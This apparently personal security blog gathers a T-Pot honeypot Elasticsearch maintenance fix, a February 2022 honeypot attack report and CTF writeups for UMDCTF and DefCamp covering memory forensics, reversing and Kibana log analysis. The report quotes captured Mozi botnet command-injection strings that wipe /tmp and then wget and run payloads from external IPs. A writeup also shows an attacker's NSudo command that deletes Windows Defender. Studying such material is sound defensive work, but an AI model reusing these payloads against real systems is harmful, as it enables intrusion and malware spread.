T-Potを22.04.0 にアップデートした後、5か月経過したころに503エラーに発生してKibanaの画面につながらなくなった。 　

原因を確認したところElasticsearch のIndex数が単調増加しており、その結果発生したメモリ不足が原因だった。 Elasticsearch Curator が機能していないようだ。
　

確認を進めるとT-PotではElasticsearch Curator の機能がパージされており、Index Lifecycle Policiesへログローテーション方式が変わっている。

Breaking Changes

Elasticsearch Curator is no longer supprted and superseded with Index Lifecycle Policies available through Kibana.

github.com 　 　

crontabの以下設定も機能していない。

In /etc/crontab look for the following lines and adjust the configs to your needs.

# Delete elasticsearch logstash indices older than 90 days $myRANDOM_MINUTE $myDEL_HOUR * * * root curator --config /opt/tpot/etc/curator/curator.yml /opt/tpot/etc/curator/actions.yml

Elasticsearchの不要なIndexを手動でclose → delete を実施することでメモリ不足が解消された。

①削除対象のIndexをクリックする。 　

②[BULK ACTION] →[Close index] を選択する。 　

③StatusがOpenからCloseに変更されたことを確認し、[BULK ACTION] →[Delete index] を選択する。 　

④Indexが削除されたことを確認する。

併せて90日のログ保存ポリシーを適用する。

⑤kibanaのstack management → Index lifecycle policies を選択する。
　適用するポリシーの列のAdd policy to index template を選択する。
　

⑥Linked template indexの値が変更されたことを確認する。
　設定したルールは次に作成される’indexから適応される。 　

⑦既存のindexに反映させるためAPI経由でsettingsを変更する。

PUT logstash-*/_settings
{
  "lifecycle" : {
      "name" : "90-days-default"
    }
}

ロシアによるウクライナへの軍事侵攻が2/24(木)から開始された。

タイムズ紙によるとロシアによるウクライナ侵攻の直前に、中国がウクライナに大規模なサイバー攻撃を仕掛けていたとの報道もあり中国がロシアの侵攻を事前に織り込んでいたことが示唆されている。 www.thetimes.co.uk

戦争の激化に伴い、ウクライナ侵攻に関連するアクセスもより活発になることが予想される。一刻も早い戦争終結を祈るばかりである。
www3.nhk.or.jp

T-Potにて1か月運用した結果を記載する。

今月のChangelog

・今月は無し。 ※CHANGELOG.mdを参照していたがメンテされないため、Commitsログを参考にする。

github.com github.com

前提条件

運用日時：2022年2月1日-2022年2月28日

運用期間：28日

結果

①各ハニーポットで検知したAttack件数

• T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。

• Result
  • 先月はデータ消去事故が発生したため、先月比の比較は無し。

②攻撃元の国名と件数(Top 20)

• 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。

• Result
  • ロシア(1位)、ウクライナ(19位)のアクセスはあるが、ウクライナから特別アクセスが増えている傾向は無し。

③検知したCVEの脆弱性と件数

• Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。

• Result
  • 新規の脆弱性は無し

④よく攻撃されるユーザ名

• ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。

• Result
  • メールアドレスをユーザ名に指定したアクセスが幾つか確認された。 　info@mailrelay.local(25位)、sales@mailrelay.local(38位)、test@mailrelay.local(43位)

⑤よく攻撃されるパスワード

• パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。

• Result
  • パスワード に関連した文字列が多かった

⑥今月のマスオさんとZmap

• massscanの観測結果は以下の通り。

• Zmapの観測結果は以下の通り。

• Result

  • 特記事項は無し。

最後に

Peach is the best.

* shファイルとexeファイル関連の問い合わせは以下の通り。

◆shファイルに関するアクセス
ASCII text, with CRLF line terminators  /putkite/quickr1n.sh
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV)    /1.txt
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV)    /1a.txt
POSIX shell script, ASCII text executable   /bins.sh

◆exeファイルに関するアクセス
PE32 executable (GUI) Intel 80386, for MS Windows   exiles.exe
PE32 executable (GUI) Intel 80386, for MS Windows   s.exe
PE32 executable (GUI) Intel 80386, for MS Windows   smss.exe

◆jsファイルに関するアクセス
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/101.0.54.113:34156/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/103.217.123.245:35220/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/117.198.251.73:41927/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/117.201.207.222:59276/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/117.251.57.35:46227/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/118.232.97.242:54791/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/175.11.134.111:24485/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/185.181.43.55:39167/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text    /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js

金, 04 3月 2022, 23:00 UTC — 日, 06 3月 2022, 23:00 UTCに開催されたUMDCTF 2022 に会社のチームで参加した。 他のチームメンバーの陰で2問だけ解いたので、以下にWriteupを記載する。

Forensic

Renzik's Case

My friend deleted important documents off of my flash drive, can you help me find them?

Renziks_Case.zip

Author: matlac

添付ファイルはUSBのイメージファイル。 普通に認識できる状態のためFTKImagerで読みだしてみる。
ゴミ箱の中にflagの記載された画像がある。

flag : UMDCTF-{Sn00p1N9_L1K3_4_Sl317h!}

Reverse

tiny

Scan for free crypto currency!

tiny.png

Author: matlac

添付のQRコードをParseするとBase64エンコードされたXZファイルが取得できる。

XZファイルを解凍するとELFファイル(MISP形式)が得られる。

得られたelfファイルをghidraでdecompileするとmain関数で以下の処理を実施している。

① main関数

undefined4 main(void)

{
  FUN_00400834(0);
  FUN_00400974(0);
  return 0;
}

②FUN_00400834

undefined4 FUN_00400834(uint uParm1)

{
  uint uStack36;
  undefined4 uStack32;
  undefined4 uStack28;
  undefined4 uStack24;
  undefined4 uStack20;
  undefined2 uStack16;
  int iStack12;

  iStack12 = __stack_chk_guard;
  uStack32 = 0x756c6660;
  uStack28 = 0x70637d6f;
  uStack24 = 0x3b705566;
  uStack20 = 0x3c60513e;
  uStack16 = 0x7d4e;
  if ((uParm1 & 0x1fffffff) == 0) {
    puts("lol no");
  }
  else {
    uStack36 = 0;
    while ((int)uStack36 < 0x12) {
      putchar((int)*(char *)((int)&uStack32 + uStack36) ^ uStack36);
      uStack36 = uStack36 + 1;
    }

⇒上記のuStack32とuStack28とuStack24とuStack20とuStack16部分については格納された値とindex番号をXORする処理を0x0～0x11(=18)回実施している。

>>> chr(0x75^0x0)
'u'
>>> chr(0x6c^0x1)
'm'
>>> chr(0x66^0x2)
'd'
>>> chr(0x60^0x3)
'c'
>>> chr(0x70^0x4)
't'
>>> chr(0x63^0x5)
'f'
>>> chr(0x7d^0x6)
'{'
>>> chr(0x6f^0x7)
'h'
>>> chr(0x3b^0x8)
'3'
>>> chr(0x70^0x9)
'y'
>>> chr(0x55^0xa)
'_'
>>> chr(0x66^0xb)
'm'
>>> chr(0x3c^0xc)
'0'
>>> chr(0x60^0xd)
'm'
>>> chr(0x51^0xe)
'_'
>>> chr(0x3e^0xf)
'1'
>>> chr(0x7d^0x10)
'm'
>>> chr(0x4e^0x11)
'_'

③FUN_00400974

undefined4 FUN_00400974(int iParm1)

{
  int iStack68;
  int aiStack64 [13];
  int iStack12;

  iStack12 = __stack_chk_guard;
  memcpy(aiStack64,&DAT_00400c94,0x34);
  if (iParm1 == 0) {
    puts("lol no");
  }
  else {
    iStack68 = 0;
    while (iStack68 < 0xd) {
      putchar(aiStack64[iStack68] >> 2 ^ 2);
      iStack68 = iStack68 + 1;
    }
  }
  if (iStack12 == __stack_chk_guard) {
    return 0;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

⇒&DAT_00400c94に設定したデータを配列型としてaiStack64に渡している。

&DAT_00400c94

        00400c94 00              ??         00h
        00400c95 00              ??         00h
        00400c96 00              ??         00h
        00400c97 ca              ??         CAh
        00400c98 00              ??         00h
        00400c99 00              ??         00h
        00400c9a 01              ??         01h
        00400c9b b2              ??         B2h
        00400c9c 00              ??         00h
        00400c9d 00              ??         00h
        00400c9e 01              ??         01h
        00400c9f 76              ??         76h    v
        00400ca0 00              ??         00h
        00400ca1 00              ??         00h
        00400ca2 01              ??         01h
        00400ca3 da              ??         DAh
        00400ca4 00              ??         00h
        00400ca5 00              ??         00h
        00400ca6 01              ??         01h
        00400ca7 aa              ??         AAh
        00400ca8 00              ??         00h
        00400ca9 00              ??         00h
        00400caa 00              ??         00h
        00400cab c6              ??         C6h
        00400cac 00              ??         00h
        00400cad 00              ??         00h
        00400cae 01              ??         01h
        00400caf 76              ??         76h    v
        00400cb0 00              ??         00h
        00400cb1 00              ??         00h
        00400cb2 01              ??         01h
        00400cb3 c2              ??         C2h
        00400cb4 00              ??         00h
        00400cb5 00              ??         00h
        00400cb6 01              ??         01h
        00400cb7 0a              ??         0Ah
        00400cb8 00              ??         00h
        00400cb9 00              ??         00h
        00400cba 01              ??         01h
        00400cbb 9a              ??         9Ah
        00400cbc 00              ??         00h
        00400cbd 00              ??         00h
        00400cbe 00              ??         00h
        00400cbf ce              ??         CEh
        00400cc0 00              ??         00h
        00400cc1 00              ??         00h
        00400cc2 01              ??         01h
        00400cc3 b6              ??         B6h
        00400cc4 00              ??         00h
        00400cc5 00              ??         00h
        00400cc6 01              ??         01h
        00400cc7 fe              ??         FEh

aiStack64にstackした値を4バイト毎に2bit右シフトして2でxorする。

>>> chr(0x00CA>>2^2)
'0'
>>> chr(0x01B2>>2^2)
'n'
>>> chr(0x0176>>2^2)
'_'
>>> chr(0x01DA>>2^2)
't'
>>> chr(0x01AA>>2^2)
'h'
>>> chr(0x00C6>>2^2)
'3'
>>> chr(0x0176>>2^2)
'_'
>>> chr(0x01C2>>2^2)
'r'
>>> chr(0x010A>>2^2)
'@'
>>> chr(0x019A>>2^2)
'd'
>>> chr(0x00CE>>2^2)
'1'
>>> chr(0x01B6>>2^2)
'o'
>>> chr(0x01FE>>2^2)
'}

②と③を合わせたものがflagになる。

flag : umdctf{h3y_m0m_1m_0n_th3_r@d1o}

感想

・jdata のzipファイル形式で作成されたelfファイルの仕組みを気付けなくて悔しい。
・CompTIA Security+ ：5月取得　⇒ CISSP ：10月取得目指して頑張るノシ！！୧(๑›◡‹ ๑)୨
・In these times, I'm against the war anyway, so I'll donate !!

I attended DefCamp CTF 21-22 Online on Fri, 11 Feb 2022, 09:00 UTC - Sun, 13 Feb 2022, 15:00 UTC with a team from my company. It's been a while since I submitted a flag, so here's a writeup.

Forensic

this-file-hides-something

Description：
There is an emergency regarding this file. We need to extract the password ASAP. It's a crash dump, but our tools are not working. Please help us, time is not on our side.

PS: Flag format is not standard.

Author：Wolf
Difficulty：Medium
Attachments：crashdump.zip（0.7GB）

If you download and unzip the problem file, you will find an elf file.

I'll assume it's a memory dump and check the information in volatility.

root@wh:/home/wh/crashdump# vol -f crashdump.elf imageinfo
volatility  volname     
root@wh:/home/wh/crashdump# volatility -f crashdump.elf imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : OSXPmemELF (Unnamed AS)
                     AS Layer3 : FileAddressSpace (/home/wh/crashdump/crashdump.elf)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80002831120L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002833000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2022-02-06 11:04:38 UTC+0000
     Image local date and time : 2022-02-06 03:04:38 -0800

It seems that the OS of the memory analysis target is the one of Win2008R2. I proceed to investigate based on the profile information I got. Since the question says that we want to know the password, we check the password with lsadump option.

root@wh:/home/wh/crashdump# volatility -f crashdump.elf --profile=Win2008R2SP0x64 lsadump
Volatility Foundation Volatility Framework 2.5
DefaultPassword
0x00000000  1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00000010  53 00 74 00 72 00 30 00 6e 00 67 00 41 00 73 00   S.t.r.0.n.g.A.s.
0x00000020  41 00 52 00 30 00 63 00 6b 00 21 00 00 00 00 00   A.R.0.c.k.!.....

DPAPI_SYSTEM
0x00000000  2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ,...............
0x00000010  01 00 00 00 26 db 41 81 81 b7 74 99 0d b8 a0 2a   ....&.A...t....*
0x00000020  0d 0f 0e d0 92 6b 77 1d 64 73 ab 60 47 1e 07 07   .....kw.ds.`G...
0x00000030  ab a8 fa dd 57 f3 6b 51 2e 0a 4f 79 00 00 00 00   ....W.kQ..Oy....

Because the part of DefaultPassword becomes a password, Flag is Str0ngAsAR0ck!.

flag : Str0ngAsAR0ck!

Misc

cant-touch-this

Description：
The Nesteaz company suffered from a security breach. We are low on personnel and we require your help in investigating the events collected from the compromised machine.

Credentials: elastic/k8jTYMCoAqppB

✅ Please provide the user account on which malicious actions were executed. (Points: 50)
✅ We need the IP of the compromised machine (Points: 50)
✅ The attackers managed to execute some malicious scripts without being detected by our security systems. Can you determine which program was executed? (Points: 50)
✅ What system management tool did the attacker use in order to launch its program with full privileges? (Points: 50)
✅ We know that the attacker managed to download an infected executable using a Windows utility. We need that name, please. (Points: 50)
✅ The attacker managed to give full privileges to his account. We need the code of the event triggered by this action. (Points: 50)

Author：Wolf
Difficulty：Medium
Attachments：N/A
Address：34.141.93.151:32729

When you access the URL, you will see Kibana's management console screen.



Click Discover in the left pane of Kibana.



You can see the log of winlogbeat-*, which seems to be a mechanism to collect Windows event logs using beat.



Since 15-minute intervals don't give any information, we specify a search period of logs up to a fortnight ago. We can see that the attacker's access occurred between 2/2 and 2/9.



A quick look at the log shows that there is a suspicious user named user.name: "malware_attacker", so do a keyword search for malware_attacker.
The number of hits is reduced from 43,596 to 22,468.



Also, a quick look at the logs shows that the malware_attacker is operating under C:\Users\plant\, so do a keyword search on plant.
The number of hits is reduced from 22,468 to 1,482.



Looking at the log, we can see the following suspicious activity.

@timestamp　Feb 9, 2022 @ 01:58:27.422
_index　winlogbeat-7.9.3-2022.02.08-000001
host.name　DESKTOP-IHO95MC
host.os.kernel　10.0.19041.1466 (WinBuild.160101.0800)
host.os.name　Windows 10 Home
message　
　Image: C:\Users\plant\AppData\Local\Temp\NSudo.exe
　Description: NSudo for Windows
　Product: NSudo
　Company: M2-Team
　OriginalFileName: NSudo.exe
　CommandLine: NSudo  -U:T -ShowWindowMode:Hide  sc delete  windefend  
　CurrentDirectory: C:\Users\plant\AppData\Local\Temp\
process.parent.command_line　C:\Windows\system32\cmd.exe /c ""C:\Users\plant\OneDrive\Desktop\stuff-i-want\Defeat-Defender.bat" "

From the above log, we can see the following
・The operating system of the attacked device is Windows 10 Home and the IP is 192.168.0.108.

・NSudo for Windows is a tool used to launch any application with administrator rights. 　github.com
・You have removed the Windows Defender service with administrative rights to make it harder to be detected, and it is running from Defeat-Defender.bat on OneDrive.

Search for download to check the malware download process.
The number of hits is reduced from 1,482 to 112.



After downloading Defeat-Defender.bat from the following log to check the process related to the download, WinUpdate.exe is renamed and placed under the startup folder. This setting has been made permanent to run automatically at PC startup.



Finally, I'm looking for logs related to privilege escalation. user.txt is available, so I'd like to get root.txt and do some things as administrator.
If you check the log, you will find that winlog.event_id : 4672,message : Special privileges assigned to new logon.

This event generates for new account logons if any of the following sensitive privileges are assigned to the new logon session.This means that you get administrator rights. docs.microsoft.com

Based on the above, the FLAG is as follows.

flag :

✅ Please provide the user account on which malicious actions were executed.
　⇒ malware_attacker
✅ We need the IP of the compromised machine
　⇒ 192.168.0.108
✅ The attackers managed to execute some malicious scripts without being detected by our security systems. Can you determine which program was executed?
　⇒ Defeat-Defender.bat
✅ What system management tool did the attacker use in order to launch its program with full privileges?
　⇒ NSudo.exe
✅ We know that the attacker managed to download an infected executable using a Windows utility. We need that name, please.
　⇒ WinUpdate.exe
✅ The attacker managed to give full privileges to his account. We need the code of the event triggered by this action.
　⇒ 4672

Finally, we would like to thank you for organising this wonderful competition. Have a nice day !!